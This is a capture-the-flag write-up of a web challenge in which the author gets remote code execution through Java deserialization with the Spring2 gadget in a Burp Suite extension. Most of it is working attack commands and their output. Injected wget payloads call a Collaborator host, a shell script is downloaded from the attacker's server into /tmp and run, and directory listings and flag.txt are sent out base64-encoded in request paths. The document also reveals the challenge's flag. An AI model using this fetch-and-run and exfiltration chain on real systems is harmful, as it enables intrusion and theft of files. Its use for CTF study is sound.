Tags: spring java-serialization rce java
Rating:
# ▼▼▼TOO_MANY_CREDITS_2(Web:432pts,71/661=10.7%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Aim for RCE with Java serialization】
Using BurpSuite Extender **Java Deserialization Scanner**
(Reference) `https://portswigger.net/bappstore/228336544ebe4e68824b5146dbbd93ae`
↓
It turns out to be `Spring serialization`
---
## 【Try and error】
Exploit `Spring` with BurpSuite Extender
↓
```
○Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net" ⇒GET /
×Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net --user-agent test" ⇒ No access
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo 'test'`" ⇒GET /`echo
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo test`" ⇒GET /`echo
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`id`" ⇒GET /`id`
※Backquotes are treated as letters
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/$(id)" ⇒GET /$(id)
※$(id) are treated as letters
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/|id" ⇒GET /|id
※| are treated as letters
×Spring2 "sleep 10;wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep" ⇒ No access
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep;sleep 10" ⇒GET /sleep;sleep
※; are treated as letters. Terminated by a `space`.
```
↓
Some characters seem to be unusable.
---
## 【Finally】
Finally, I wrote a shell file to the server and executed the shell
↓
```
○Spring2 "wget -P /tmp/ http://my_server/kaz.sh"
○Spring2 "sh /tmp/kaz.sh"
```
---
## 【exploit】
Create **the following file** and put it on **my_server**, and writable under `/tmp/` folder
↓
kaz5.sh
```
#!/bin/bash
wget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`ls|base64`
```
↓
Write the file obtained by wget in the `/tmp/` folder
```
Spring2 "wget -P /tmp/ http://my_server/kaz5.sh"
```
---
Execute file
```
Spring2 "sh /tmp/kaz5.sh"
```
↓ Access comes to my_server
```
GET /YmluCmZsYWcudHh0CmxpYgo= HTTP/1.1
Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net
```
↓
`YmluCmZsYWcudHh0CmxpYgo=`
↓ base64 decode
```
bin
flag.txt
lib
```
---
## 【Get flag】
```
#!/bin/bash
wget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`cat flag.txt|base64`
```
↓
```
Spring2 "wget -P /tmp/ http://my_server/kaz10.sh"
Spring2 "sh /tmp/kaz10.sh"
```
↓ Access comes to my_server
```
GET /Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg== HTTP/1.1
Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net
```
↓
`Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg==`
↓ base64 decode
`gigem{da$h_3_1s_A_l1f3seNd}`
